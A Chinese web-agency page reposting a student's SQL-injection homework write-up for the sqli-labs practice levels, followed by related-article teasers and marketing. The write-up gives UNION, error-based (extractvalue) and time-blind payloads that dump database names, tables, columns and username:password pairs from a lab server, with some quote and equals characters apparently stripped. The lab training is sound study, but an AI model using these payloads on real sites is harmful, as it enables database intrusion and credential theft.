尧图网络 高端网站定制 · 原创设计
免费咨询热线
400-888-6620
免费获取方案
sqli作业
sqli作业Less-1单引号闭合闭合方式加个单引号看报错http://192.168.40.129/sqli/Less-1/?id1报错里1 LIMIT 0,1说明源码是WHERE id$id用闭合就行。ORDER BY 试列数?id1 order by 4-- # 报 Unknown column 4列数3UNION 找回显位?id-1 union select 1,2,3--2 和 3 回显在 name 和 Password。然后直接梭哈爆库?id-1 union select 1,database(),3-- 爆表?id-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schemadatabase()-- 爆列?id-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_nameusers and table_schemadatabase()-- 爆数据?id-1 union select 1,group_concat(username,0x3a,password),3 from users--Less-2整型闭合方式无整型不需要闭合id2-1返回第一个用户数据说明是数字型爆库?id-1 union select 1,database(),3-- 爆表?id-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schemadatabase()-- 爆列?id-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_nameusers and table_schemadatabase()-- 爆数据?id-1 union select 1,group_concat(username,0x3a,password),3 from users--Less-3单引号括号闭合方式)?id1源码是WHERE id($id)。爆库?id-1) union select 1,database(),3-- 爆表?id-1) union select 1,group_concat(table_name),3 from information_schema.tables where table_schemadatabase()-- 爆列?id-1) union select 1,group_concat(column_name),3 from information_schema.columns where table_nameusers and table_schemadatabase()-- 爆数据?id-1) union select 1,group_concat(username,0x3a,password),3 from users--Less-4双引号括号闭合方式)?id1源码是WHERE id($id)。爆库?id-1) union select 1,database(),3-- 爆表?id-1) union select 1,group_concat(table_name),3 from information_schema.tables where table_schemadatabase()-- 爆列?id-1) union select 1,group_concat(column_name),3 from information_schema.columns where table_nameusers and table_schemadatabase()-- 爆数据?id-1) union select 1,group_concat(username,0x3a,password),3 from users--Less-5报错注入extractvalue闭合方式页面只显示You are in...不显示数据但会报 MySQL 错误。用 union 查出来也看不到改用报错注入。?id1 → 正常 ?id1-- → 正常闭合确认extractvalue 一把梭爆库?id1 and extractvalue(1,concat(0x7e,database()))--爆表?id1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schemadatabase())))-- 爆列?id1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_nameusers and table_schemadatabase())))--extractvalue 一次最多回显 32 字符数据多的话用 substring 分段第1段?id1 and extractvalue(1,concat(0x7e,substring((select group_concat(username,0x3a,password) from users),1,30)))-- 第2段?id1 and extractvalue(1,concat(0x7e,substring((select group_concat(username,0x3a,password) from users),30,30)))-- ...以此类推Less-9时间盲注闭合方式这个更狠连报错都没有永远只显示You are in...只能靠 sleep 判断?id1 and sleep(3)-- → 页面卡3秒 → 有注入闭合为 确定闭合后上脚本爆破。
RELATED

相关推荐

前端加密参数逆向实战:补环境法快速破解MD5签名

前端加密参数逆向实战:补环境法快速破解MD5签名

1. 项目概述:一次高效的参数逆向实战最近在分析一个数据接口时,遇到了一个典型的加密参数逆向场景。目标网站(我们姑且称之为“某球网”)在其关键请求中携带了一个名为md5_1038的参数。这个参数的值,顾名思义&#xff…

📅 2026/9/8 4:08:19
AI辅助学术写作:工具、效率与质量提升

AI辅助学术写作:工具、效率与质量提升

1. 从手写到智能:当代学术写作的范式转移十年前我完成第一部学术专著时,光是整理文献卡片就用了三个月。如今AI工具的出现,彻底改变了知识生产的游戏规则——上周我用新方法完成了同样体量的文献综述,只用了三天半。这不是魔法&am…

📅 2026/9/16 11:35:42
BQ4050数据闪存深度解析:从架构到实战的BMS配置指南

BQ4050数据闪存深度解析:从架构到实战的BMS配置指南

1. 项目概述:为什么我们需要深入理解BQ4050的数据闪存?在电池管理系统(BMS)的开发与调试中,我们常常会遇到一个核心问题:芯片的“出厂设置”往往无法完美适配我们手中那款特定的电芯。你可能遇到过电池电量…

📅 2026/9/20 7:17:13
MORE NEWS

更多资讯

📰

cAdvisor Web UI 使用与认证配置指南:容器实时监控页面与 HTTP Basic/Digest 认证实战

cAdvisor Web UI 使用与认证配置指南:容器实时监控页面与 HTTP Basic/Digest 认证实战 【免费下载链接】cadvisor Analyzes resource usage and performance characteristics of running containers. 项目地址: https://gitcode.com/gh_mirrors/ca/cadvisor …

📰

规章制度的作用避坑指南

规章制度作用最佳实践:性能优化避坑指南 官方文档翻了三遍,核心逻辑还是没吃透?别急,这是大多数开发者的通病。 别被厚厚的规范文档吓退,真正的最佳实践往往藏在细节里。 我们直接看代码,拆解一个典型的性能瓶颈场景。 性能瓶颈:为什么查询会卡死…

📰

FPGA全局时钟缓冲器BUFGCTRL详解与工程实践

搞FPGA的兄弟对时钟树肯定不会陌生。7系列里但凡涉及高扇出时钟、跨时钟域切换、低功耗门控,几乎绕不开BUFGCTRL这个原语。它是全局时钟缓冲器BUFG的底层核心,BUFGCE、BUFGMUX这些常见原语本质都是BUFGCTRL的一层封装。很多初学者只知道在代码里写个BUFG…

📰

Cadence Virtuoso原理图设计与仿真实战指南

1. 这不是软件安装说明书,而是一份“能画出第一张可仿真的原理图”的实战手记我带过十几届微电子和集成电路方向的本科生做课程设计,也帮过不少转行做模拟IC设计的工程师补基础。每次看到新人打开Cadence Virtuoso 6.1.7,鼠标悬停在Schematic…

📰

Microchip Studio 7 烧录全流程:从工具配置到熔丝位设置与故障排查

1. 为什么还要聊 Microchip Studio 7 的烧录如果你手头有一块 ATmega328P、ATtiny85 或者 SAM D21 的板子,大概率绕不开 Microchip Studio 7 这个 IDE。它前身是 Atmel Studio,Microchip 收购 Atmel 之后换了名字,但骨子里还是那套 AVR/ARM 的…

📰

3步搞定52088性能瓶颈 一文搞懂调优实战

3步搞定52088性能瓶颈 一文搞懂调优实战 配置环境就卡半天?别急,今天咱们不整虚的。 很多兄弟在本地跑【52088】相关模块时,一启动CPU直接飙满,接口响应慢得像蜗牛。 其实这背后是典型的IO阻塞与内存泄漏混合故障, 一文搞懂…

TODAY

今日更新

THIS WEEK

本周精选

THIS MONTH

本月热门

读完文章,想聊聊您的网站?

告诉我们您的行业与需求,资深顾问一对一梳理方案与报价,全程免费。

📞 💬